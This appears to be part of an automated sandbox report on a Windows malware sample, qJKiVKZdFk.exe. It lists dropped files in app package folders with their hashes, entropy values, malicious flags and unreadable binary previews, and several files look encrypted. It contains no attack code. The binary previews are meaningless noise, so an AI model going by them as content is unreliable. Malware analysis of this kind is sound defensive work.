                                                                                                                                      Preview:regf..iB...w....K....J...slZ7..#..q.....#..+.i^..]...P.X..Z.....D.l....AQ&wZ.:.se.<0.K..xe.y...W.].._"..R....Y..R..~.Dz.aj~y...d.L@.%.*CO...:.i.$%.........SL*.q)..=.+..".m......zR...1..!.....r`...bF.r.KL.....@...6N..m*.|}.h0..B.^......@..Y...c.!..M........0qF.e]..FR"#.<^..>...h.W.|...p.+.w/,......S~nL..1l...&....j.aU.R..H.."C.R..>.b.u.GB.A......|..-.S...".O^......-.=.<s.....{clN.{..tIm...|..@....{...B.jw`4...<...R..X..K...J..?3|..C.SLCILEV.]C~..!......v..A.V....XD.S.J..,..5.....eb.6..n..6.PQu;.*.W.=oZ...........[.~..].A..?.....A.(.g9{..).e.4t.{....P..U.*0hP.?F.$.l...)5.}7B..........9.3.}G...cYk.4..'.Z(.p.....H..M.WSQK..a..G[.8.......r...q11,a>.'.I../.....T.,..S.Vo...._r.i.'..D.)...b.P..Xp...oa.Z.....?.Mo..;5.uAK..y..GM...?..&.U....X{...s.o.....7u*l.. ihG..Q...g,k...ER......L_......em(....swD{.7..C._M.....,.9g..KO{.}Q....>w.WXc...W|.........b..vg....z.*....r..*3^Ex....C..U8m..*...k...H...%..)..9./:..9.. G..=.^../.e[....0...E.A/.....w....N_4.vd9.~d.W

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974500410238633
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:f7gtavl6gQPpLciFiM825+EGDhJPwaJLk6bifT0mgiTpz6T:jgtQWX82uhJ5tk6WfTfgv
                                                                                                                                      MD5:E421AFB68979450892A9D30A406BB31F
                                                                                                                                      SHA1:31E8916C86EFBDD50670EFC9A7796E52447A3176
                                                                                                                                      SHA-256:B8B68743859F357500185D9739F6D5899B4CFB1D0B9AE8E65E49773CC90DAED8
                                                                                                                                      SHA-512:1E75F5DB4061EF3BB616F7FC8A0BF861CFA78C1AB06ED891867085AB1A30E5114AF399EA60652E52A589FDB01195FCC6BA2AB4999D76DFE7B0008336D43864EB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.&(.J.nc.k..K.u..6..Qj..,J..?.]..V...r.x|..j..q.....v...T.%n.......(..c.*.0/...:X.\.R...8...%.uPzg;...%v*..~~(..XxC...... ......l....Cf....#.9..../..|...(..L.kX''F...!.W|V.<l.....eB.I.....[<..".O......z....m.0...\!'>C...'.y.w.iXP.......FY[|......z...G........rv]9._........s+uw....%[.&...gh1M.@....!f.9YTA.:.W.'.Z.@..1]6.V..sl/..A...K..=..:A..w..K.>D.I8.."i....q../........(XFn.V..F1J..f..v.........Dh`..~.....u.......6.L4T#.n..7.".p..X{u..zy.#,._$vF...p{..Gs_..>..).)v..H\.<..3.c...Q.S..tY..)..........(..k.......hw....A.,.....D[c..T.5..7.O.......Q.....,SqJ.....M...U....RAl..4......U.$}.....o.....Q..q..;...y...s..q.%T.f.{I1.e2!......i.g...bh........]$...|.9......3...}.12.N\.%....].\.d..&....qo?..L..M.V..........5"...[0_..(*PNn.D.L...w.~.....7...U.A%J.....=..............$.....vOT.,.-.zM..K.E.X9...!\$..01.s.......qn.N.....L..E.rHT.<0.s.\A0....._.fB.E.6l..g..j.....ju..O*.'....|~....MK.(c.Mm('k.;.V.]........|Q........._........3.'..RU...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9776328628101885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:PZ3jmozAjE7isaqp0c/Xf8k5k+84ZDTAmx6pxopCWaGfGIxt:uoes9Xf8Y5TAmcfopCW93X
                                                                                                                                      MD5:107129B4D07DD91AB9496F00EE060074
                                                                                                                                      SHA1:EAAD31E4E19CFD47C62A1A8159958B7BCE93B522
                                                                                                                                      SHA-256:E527683547A0E9ED0F3575510726A6C3E9353ACB5D0A711A95FA7DD788B19431
                                                                                                                                      SHA-512:E56FF4F55E4CB3D32A1AAFD20DFAFB21FF5A553685C7B99F2F6805EF33DF1710CF109EFD52912E582D05D343AC532E015F7981DD23D2A307DF9034A27E8D585D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..k..CPe....b..2.......i.f....U....h.f.....t......o.'d....%........B4..w2.UK.$e.GZ..2...S.r#RQ......+...5..{.?.v.-.x..H...r{...1d+(g.V..aG.y.....P.~..40..]..>.e.=-H.`.i...?.9m.C.\`5/..4.....!..d.E...R.....L.cE.....V...Q#H..9......(............8..g.y:.....I....a]......h.......L.6.x<..n.f..j`.0\....9...gBIl.....M...g......Y.c...1.]7. .d.......Z9....w.......W.e...-.>.Q.4.... b.....1.].|...x.S....Kr..H.:.p~...{...T...J...s....}......e..b{....]..~...-u.74.......U.g....../.<...@..>..:.=.D........I.j-......\D/pFY..`.P...;.=I.L..).1......3....?yIb./.......9IS...../...$.Ge..x...~..".I,..s.?.#.Dj.....O..h.?z_j<NY...0..b.9..r...K.[.G.".k-....obz...iZ*..Yx...I..)/...s....Z'.H.H..........I.~..;...lF..]e....\c..F..,.".$F..*.z.nj.1.Z....f.d....%..hN..(...#?.X}..S.1.L.+.f...>....8....zc0..fc...4..&R...V.%.E....D....S.:.x...{lKd.2v ....F.....d.....IA6..-.}O......N/.5...A....zR...E.WFq....._...9+~O...j....."VM.[n.......tA~aU..CuEw..(.y.....-..o.....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978376538260141
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:eImkYWVe78ZkjIlToV5LQaDEVQpGAh/v13aA2Bm6:NmkhewkjyTgGUEW4+V3alBm6
                                                                                                                                      MD5:53A028958153DD8AC7CE8648A30F9B95
                                                                                                                                      SHA1:BDB6A48D9B8A03476D85036AD98E7436718599A9
                                                                                                                                      SHA-256:636496BEC477539CCD830363152DE60282F6CE118BA6F9D13DF7A7595CBEA2D5
                                                                                                                                      SHA-512:87A653666DF13CAFFC6D11F88B013085150758C1A47CD040ACE98DF9527FD095F97A4018D73C4D13DCD292DC4340B6CADDEE9181663864F2A2676A1751B851C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...!1!.>...>.~[.3S7..;...8..q.......=...:..K...ga.8..ka.._<.....2..>1O..o...c9.J....|.....7...N....j.S........~N....."`.2.f.:2.....D...l.}..S.~&.f.o.........+.\.^.Hy.7....@y..z.Wm}A..4.<H.K....1...nN3.n.6{zH.aK|>./....: 3i..UC9.eI..=.Ca4"/nKZ.c..._. .o.[.X......F.IV+$..r.....F...1....7q..?}S......!.B.>..9..T."c.)...3$.....O.......".k(..6.....!z+@....iM...w:N;$*t..Z..v 9.....=....LM.v....8......aG#..y.t.h.B.......Sy..jy..;\....g.C........X...+".e..it.h.hN3..{......w......6.......9....P....vZE.e.T5..%.)*..|...oG...5ux`;...y..i..J..D{.(lVc/2:.-..Z.25"..\..j3UG......c............3[^=.+..4g...p...u........X.0.....D-.p....@$XE......|ssBF.3.....*Svw$..Mt"....*....s.v_...1]..[..v........K..x..j.2m.0........;.@C.Q(.M.._^.k?2}...Df......w2..V.".M%K...*.<|...x.....V.......[.....uS.@^ee......v.l.u.S.'...k...q>.../...Lk;\...*..w.r@..H@..sw.K...y.z.i....Q.n...&jl....GR.D.....5^..9..v.,k....=vAT..5>L$;.Y....Kp.x.9.C..M.....Ch........E.Z....8...l

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.97737700370435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:WM5Np5TIqJBGljBWFzvaHORepS9AGvBAaSF6xoncGRfM:WsJABWFziHORepa/O+7GfM
                                                                                                                                      MD5:B39FEB0DDF939B9362CC60E87272A180
                                                                                                                                      SHA1:3872324EA3C924DD86F2030987E2700740C71899
                                                                                                                                      SHA-256:529DC54A5CDCDF47A077C9D84598D3EA0F8E340704624B413964FCC353C3A670
                                                                                                                                      SHA-512:4B7315E51907ECFDCE267793541DD25212CC777B5558A310CF568DD479EF67A9B7586D99EB060BC8F584183E312006E964B6A7837D3D204BAA7714DC61C0CCEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..q]...$...Ip..Jv~...o.L.+'.....}....x{..Ng1..?..j.;.v......-.Z..(....(.[.J.b.r.........i...U.Y.!.iW.9dVP..f~-...r....GoP:r.F.L.}.*.0.p.j.6>k.{..k...9.>...T)...N..0..;..v..*G.<.LRlk..u....AdBf..6k..{.,..(.3.&*.2l..~..yP....@.<9....,<(...:9.o.g..5.:...c0.l....._.-uN.....b.&o.].. @t...0,..z. .......W.ztS.G..C.=.<.........1...).E[y.!.R.@1k.1..u.(XKod.d..5.....9..m.R..K..`tER.....@v.{..`..s>a80..a.{.nT.2W/..*!...O...q.6.x..].....>.-{...i'G'..y.L.....G.&.9..I...O.D.......@cj..........I.D.N..u.1n,n...d.u'.X0=.....C.!.........B2.k"..:...c..:..b'..D.X..y..(.R{...`..7.d.I7..E(....hT..........C.f.d.u.Y..my.T5M....)...:.e...5<...x...2bg.#y...%Y*..W.2.Wk...........1Iq......b5....h...P..JP.fO...(...b.(...........nAy..)..?.U]y.Y..7....*r.VY0W D&.g.=..?CVSL..#>/h......$.$..<.M.[.n..cp].&&...]./.(.>g>W..^.}...i..S.`\..?!..:H,.....%.Ty...| ..w!..5h....7......V...=.(.=...hx....Y.>.=E.a@...]."6....N..%.|z..2...p.....4....t.|..;@9P..K\t.f....(*4.......

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4430
                                                                                                                                      Entropy (8bit):7.952364033924956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:BHTHippAslMA3QYUbg4JefV8NnlVcg0eFffRDXn3l:BHTHiHAPNYag4Je693x3l
                                                                                                                                      MD5:3F822D85D939B2B7B5B256DBDB8BC030
                                                                                                                                      SHA1:E8358AA99465EDCF067F699C2EA63E8F644DDCCB
                                                                                                                                      SHA-256:04DD45D2DC4C68614A13BFC1C4597BBA5E14A292DF7326F4BB706F1C068974E0
                                                                                                                                      SHA-512:31C4C8FFF0A97EAB42D26236E2E520B85420EC272F663D6C8CA1E657EBC48550A1E7D8C995C2B7F2D26817F567D9CE1540FA6E8879413B695B94C06627D1D516
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit..8g.......f.c..r.U.H..y{.9..tN.1..7......RUa...x.m...M...4,h........L............:.%Z...D.....v.....}...;.3%..Fnr........v.nR.s.....R.J....=.......7...2l......IF.<......*j........0..ZK.....:K.!.[\19...=..!..+.%..E=y...Y.l....l.......0...Qz....N..Q"_}..i.......D...`...GD>W...e....xm.Dg..@.3..{Tp.}6&D=.......A....@Z.s.~..hC.&2..-2x.Q).....z.`.Q..%......#....=..w...r..PD.lK...~...0....~h.Z.^..S..N.N.m.....e#.,...."~..8g..5...$..yz...[..F..)...\....!.o..s5....H...N..........k.O.V...F..=..F....d....GR.T0.I.2.).....!..Q."U...W.3.l.G.v..y.{y.B..G....T.....f.z:$.......`*Q..N.......5.........d.kS......[$.}..D....@....Y..Fp. O.]=D.......4&X.r......b..C.?5...Z...R....X.$.,..4:1...f.. ..8y.J.9..l'. ....-..":bz\..8..N...J.W.;...H....|.E;.U|.z...dC...D......=.p'.w$8e........k...v....7.<............&._Q.....d.L..x.....V.`0...k.........^.Dv]$...7...F..o.Bgp.|<.z../.r*.j.v..s.e.|.2;0..D.$..=.xIh..5..($\j.. .>....O.*x...M^A......g...k.M2...^...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.994807679401514
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:WrvLCC5vOKzy23WiWg6Y5OjD80al6WWsOgRp08OfdSY3/cE6ozR:kCuOQUg6AOP80fvgD5Oll9L
                                                                                                                                      MD5:DF03979161EC503F0E4A90B3F203B8A1
                                                                                                                                      SHA1:789F2374EC2AEB88F6BA2A1AB13DCEB675328699
                                                                                                                                      SHA-256:96B9F629DB3DEE038E78595A0605F9B3AAE9BB38B1DFB37DB0D0132609537D24
                                                                                                                                      SHA-512:5F00D28052810D27DA4D07AA1C222238071CB0B44D67AF1E09F72F37B05F059EDD3E66284F9D7479F051254D5F2C9FF44BCA8429DF7E95BFD33E3A5EFAAA5C71
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..'...'^........F$.v.....*.U.M.;.u.b....;vE.\..7...q.O6e7..R_\..u...jf...|..4,._.6.m..f......t.q..j...B...F.e.;.......TZ.H6..9.oc.[.Jy.......R.3.q.@..[U.,t..3.9l....>\.(..S.0zGh. ..=N.......in.a....D.Dh%\.p.y#......^...%.U..4`.M.~..c..=...K2E.;.@_.. ..LY$J.p]...7..Y.....k..`....Q.*.E....."....S.]..M3..R~......A'...hZ...B{y.@.j..R>.`(p.J.z^.+|. 9...GW.1...7.f.J..^....Z....I'......Z3.y.[[gi9._...I......g...!.`.F*b\.y.c8......M...Q.....L.n]........H..;.^...?....{.3......m....!......$......n N...tj...^.Rl.drb......f..r..B.T....zQ..N.\w.9#:$I..trQwk.X.......^.f............"..F..hHn... .....oWbp....S7....}A.....M....'.")...[.:.9o..(..9g...W...i.>.;9.-.9sV..k...7.ph~rIqd.^_c...L=P..3...-.-.n@...p..@10g...,M..ll..$d..&...!].b.X.1~.,.f..n....$.<Vu.Ar.{QMM.U.9........#...9."......S..hyT.G..?...(...."...~.k...EG.\l...G.8.*&q.........>..U9A....F*."!.2......a ..o.|.a/....zM.K....\..t.._..7.\...n. ....!|y.....Vx.^...Pa......GL..,...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:SQLite Write-Ahead Log, version 14255047
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1347606
                                                                                                                                      Entropy (8bit):1.9816946090744825
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:1kk3gNlKxeH/cMy0mSEgXK26aA6C79bwKaPeshSRnefJZYzlwOuY5h+olR9FEeIx:1kk3gNlKkEDMqsKBshjfvYJb7s
                                                                                                                                      MD5:8EE730888920B5778DABE4D8ABAB728E
                                                                                                                                      SHA1:6416EC3772304F9255C6B8D6F318CA8A50DA3F68
                                                                                                                                      SHA-256:5F79300754CFEFCEE88DE1BB608580ABC5ED7E0E9B47E129896F8B7A2E389900
                                                                                                                                      SHA-512:9454528E2372E378028A4AA750A891C25F64CBB409DDA5A321EF061F6D4D5D29E5429ABA78C361FA2573D1CD9C0E5269BF6AE3353F6A6593FBCFD875539EAC83
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:7......k...E 9Y..0.6?......wk.}J..1e....2.F.......2.q..OO.G@..!.k.EA.....^.Na.]~?...?...`V.:...E|...v.V._..!..[Z,...{:.o......%@.O.P..?.R......T.y..a...U.=Ix. '-.1.]G..j....\..M...z.s.L.....T.)...#..&...+..m..^.\.....;.}*5.H.cA..n.:b[..,.."C.$.#....I.....+.._30 ...Z .r.R{U..lq(..tv..R.y`.....s3B.e...O...(k.h:.`4.....ZwER.$.....>..=6m.._..5..2g._..0`i.@...$...NK#G..2..M. qaC.#r4..y.Q....Z.U.?I..h../W......c..P....n.O!..D.R.,..@.............eqBX..?i.OX..8..1.{...Z.....]..g@eE>>+.I..#i.)...%0.`j.....:.D.....W...V....[8..".w.d..;....L...%$...2.x.X..]..]$....3R.q..k..2.R...r.-.Iz...=..lr.T...Y..PW.`.!..U./ma].?.Y FNj.{..[xv../.rR?.,.~.n.A8.j..>..C......].#v..a.b...^...`.A.(....U(h.........|...d.....B....<.R..{.*..^.....l.Fm.F..5.y..g.|.@..D..K ^V......,mNz......h.i.}h&\GL.H.d..b.:...&.j..}....U.......#...2.6.]....z.........8......hX.....Fa>.y..3...b.-.t.....XsZ.t.M...L..O.uS...TM#qz\2..cZ.k:.*.......Bu..K3....bq...S.Y.6. ..4E(..P.NW.#.R.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65870
                                                                                                                                      Entropy (8bit):7.997261820744085
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:5xxFj82fGVr9aSX9YK4Ap7YCaAbHN0z3Rm+EjbYPFqVW:NFjpuySUCHmz3rB
                                                                                                                                      MD5:954CD45C8D9C923D0B5ACBA7CD2D21B2
                                                                                                                                      SHA1:CC0DD335CBB03432FF580A766030F64F935B5431
                                                                                                                                      SHA-256:1B23E597EF96604B6631C2D1EF4ACD1612520964D1A964C8220553972A4698EA
                                                                                                                                      SHA-512:D288939AB327B5AC129DF3B6FDAD219F6A6DEE652927E78AD512374A3A85372B7372FB4144DD7482241EA57FA378DAF26222ACFB72F587FF3D4DD4C65BD42887
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.............|.O...\qk.BN..............sS...H...5.t.B.......v...br.?....@..~)..BR.Q.8l..O..l....,;|.>.E.n.A...=.......A..9..0\.C3....y.h..z....{....XH.O..9D....Y..M..1taaz..o.&;......._..I..X...E6..no.U...r..|.p.i..B..@9.V.<zK..).).I.]...>.p.c..N..oh...._..t..BAI.M...p;...|..5.&..zB$..p!..22y..)..Z...-..P......Gs....PF+..6$j..$..:.,.._|B..d.(.#.wb`.A.y....k..,.@`.*'.[..u.. *.p.....thes~7..`?d.<,......$.=...vP.3.E .-..h.!,..z....E`s.*....i....._.jO.j......T. ..>.(E..I....}m....%B..[.LzA...r..M..{...C..'...mf.x_....b......{.z....s}!....D{...uqk.^..>v..19...P:Q.)K....u>.ktZ.{..~.N..z..&....,......1$.....Y{..........$../..yQ........m.W+....C8.)l..K..AM.HMQ./xj..x ....5...s.......b>.....i.....J.%.D.-.i]c.02..h.]..N/.C...w.j..@.....%..H.k.3-...=....ucH.'...7i....m..m!....4e..DIbf.q!..})Xa.O.'..}...C..nX...i...Y..Q.[...zW......X..+\.d...("....O..i.=}.oO'@`..S.G......HY......(.G...%...h...3.%...3`..$....s.gC......k...Yk.N.....-V>

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9806887575513406
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:tsFNrEJWvmCihc6mTj5ToxIu8xcMgR+9XHlf+mxjtVujSs/XhS:tsjEJWA6VTjtkI5cMu+tHpzjQs
                                                                                                                                      MD5:9201E5BCE66F478FEA5C1D7572A59230
                                                                                                                                      SHA1:EB9D0BE0D1623EEFE766DBA22623EBCCAE52736F
                                                                                                                                      SHA-256:08A9EAFBF4C49D3676E25488395A9896F55600B7D9B068365A5085A0C4DF78E1
                                                                                                                                      SHA-512:9D745992D47A2BD4498DA931C506360623F60E82AE80127B8F23E4336C4E8F471C29E2377E5D15B5F06C79CC89119B30CED7A1FC46872B5B3133BA691E02FA4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.-Z..r.O/...72...Uh...ZR..l..s.!..#.....I.....Xx.I....%..g..&.l...I.S. .*n....k..5..z.w.....D.YTE:e....oZ...X&s4..;e4.E.u.....-.V..].=.....ye[.?.s{.........{<..(...s..hr.......8/d...d(.s....w.....".....$&...*.Z`..~.(.7..>.~2....K{.v...JC.......;.].....0O.C.%....,.vX..e._.G.N.Q+qQ.eq....<d..@.....N.<s~.N.O........6.}....E.....h./.;<&.X....+D.2..R.O+....[z.C....V..:1.`}...J.e...[.P.U....&[5s./I...ptL......4RH..U.E.N.k|.cl....d. .{...[U....[.Q%....V.D..S..x..L..8+.Le.l2.S..Q.j.:.;...RX..NM4...0...8...y......9a..........r<.2SY.v;T.?%.B....[.......|.g........N..g.. b4XF..D.>.....`s...&....Xl{....P.*3k......l..1.I..8p.....5.-..=k.....m=....Z.O.;r..y....^.gOCLa....q/..%.:l.QR.~.?fv3.r.b.).#.Pa..d.V...cOC.O}.:QPF[...C|A1..x.=*/;..J.SM.y..d.:q..Rqp..A+.. ~......=t..%.$.t..c.!.y....|._|O."Y...|@WH$........l.=...n;3......@..o..Z&D.j9...b.a.w{b..g..];]B...0H.?J:Z.M.(.&.D....8.*.1.j+.....W.].X.....E..P;`Z,..*...,.#).&Q..&=.w..m.,S......,7y.......O....+..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978660551748297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wpDng4xzaLndpmelhvU5MmJH1okz8R/shbb2180VS:wpDng4xzWdpPrpmvp8GhpT
                                                                                                                                      MD5:092CCF6552FA11D0B71887E6765068FF
                                                                                                                                      SHA1:D0286633F907988970A726A8BABF1A99C71D0124
                                                                                                                                      SHA-256:C4F838548840AA86C01CA7AF559A62B6A2BD2CCDEA7EF6F152839A22326E2395
                                                                                                                                      SHA-512:776449526FC4C154CEEB8621E7A63CA43B9D74456E05D33FA4B5C768C13A3E3DAC50382067D636B22B78BF4559D29689BF5B3C0044A333E3D16248DBFAD79C69
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..4 Y.>-..s..#..s.............3gj..!D.D.Y.p.Oknh......+.x,j....O...@..*../.?..A.M.4.d).g.k.-....^._i...... x6}.. ..]v.....X8S.A@.:..Q....e..^.%H#Y.X.p.hM.J...\(......j.i.qz.q#......1P.>^.9.39..p..XqJ.x.7.............w....2..I.N..ck.3...!..[......<D.....D.%.........t:.GS.Z.D.]^d.S.... S.....^.J...*..fD`u..u...g..C..>_..#.[.L?C...wV.PX0..t.`RXk..N.n4.c}.o5..fI.X..0.-.2@TK7!^..u&...-......,{.o.-.G....R.Y.a*z9w.f.....c+>"..JC.{7/3.J....8j./..u..Z...L."...).f..3,p.k.e.r....T..6?...:.k...........g..2..p...Xn^..H.H..a.C...?.nb}b.iQ..!......s..{...|.k}.M.IG.t"....T.!.....v....n.....=.P;. &....)c!m0.ppa.v/....G............1r.Z....I...i...D...-bc!d.>.#k.!........'.z....Q...6..s.[}.L....t.....^.}.r...c]....O...A.JEG.6AlN3.r.^,...b....+di....m.bE<X....HG.NR.H....+..\`cv..../N.i.."..U.....A.Z...>._y.8J....j....E......$|]....?bg7x.U.W">,j+...!..8P.%^EV;..e4e.R.u....I.=].d..zE.L.mW.......scl...m.t|/w.P..0..qB.r.{......7*.....e..5u.Gd....y.o(z.i...&Ok.h..g.z%.h

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976639511794679
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pyM1jZ4Zt+DXNBpOYDvr6dJk4L+cxLyMBt/q63eWyaWvhNHh6NR6UVX:JdZ4Z6NBgY7r6dGUhxOMBt/8dvjh6NR7
                                                                                                                                      MD5:AB7803596DF04503B8C5ADA5E7079792
                                                                                                                                      SHA1:AA507EA460E4C531B44DA2BCD8F40D6FBE9E6AD8
                                                                                                                                      SHA-256:C13EBAE005A85D210EDBA47DD25608ED04F26B594F2D7286246B277D3B8AA62B
                                                                                                                                      SHA-512:FAAD4167A1A2C188F970842EAC95ABD67FE9369B3A0D28BB59C498638655302F8AAB0DB7B75F23F995C0AD6E21FF78BF7C7452E0F17A116C42C652F691A2BE7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.j.q`Er..Rba....dp!.8D9...4qg............*G....7...I...K.uJ.u...O3q..y}.;..(.{."...?2.......,....[......GZ..qi.M..H..sU..*5\.:[h.v..g)..Pe....b...]mo...7..d....j'....@...Q{\..?..9.7xCNi.*.c.3....1.B....d.q4.$...Ph..o......fKA1.^.Y....d.#..*...H.n\byI.[I.z..]w.......$.*..._.wrO*y4..Y.q..+..h.|.~(.....$V........].;..........2.6.:..bC...r.S./-QG.6.{xS.'.NT..k......%.. ...vUu6..CJ.vX..{d...f...]..z.e{.;..#.......m..!........E....m...Lm...0.t}..`..@..^kd.px.)..a_.'.Z......F.0.O..L....b5.f..l*Fw1...w.y.kVk$..t.....Gl.wF.......yj.8.o.......k.... ..f..X}jN/A...0....y]....T.[.Cxp0R.M.N.4....).,e..D.3.T...I%..S..-.L{6~A...U....tg...z.kX.!......}..;.z....Y..=....)9..R......]yK.&...*.....^T...4..Ko">?.9..,Q....R...PT5j.?....y.6Z.4.....g.I.\.._.T...F8....;......w..ufy...1a!.C.NBx...W."..3.'..~......J...(s..hkj.)3.H......P..9....=b...l..b67......=IZ.0Z.+.c.....1F.DBN.X.V...G...$F.8....{X.=DvI.$u..q...".....E...jK...]...N..)..Lt....n......{

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20594
                                                                                                                                      Entropy (8bit):7.989859572201114
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:ccQV77xqCpWuI+w3A4wjX8p4m09yJdC1wpKkZKuNVU0KZjLeCxgK3tZmpHjFtTCy:ccQ5xpWbrrpsOCRuN7CTmytZmpHPCt0
                                                                                                                                      MD5:B6ED2823F4E36A11AD48AB7FB40F6602
                                                                                                                                      SHA1:0E9DBCFDBCF01B1C088AD30E2AAD9ED4A7320753
                                                                                                                                      SHA-256:FF848D33012A5C4D124E95B5BE4DD4563E9DC0ADD1866F06B8DF10AB245B84DE
                                                                                                                                      SHA-512:A83DA0953FEC3F790D35144834A2B7BF6B27C3089D731360B78F55DF3CE0E5E6C110CBDC9A2E96D7504ADCAB8897379BA2B48D13414FFDDA57B97CBC6178B5A4
                                                                                                                                      Malicious:false
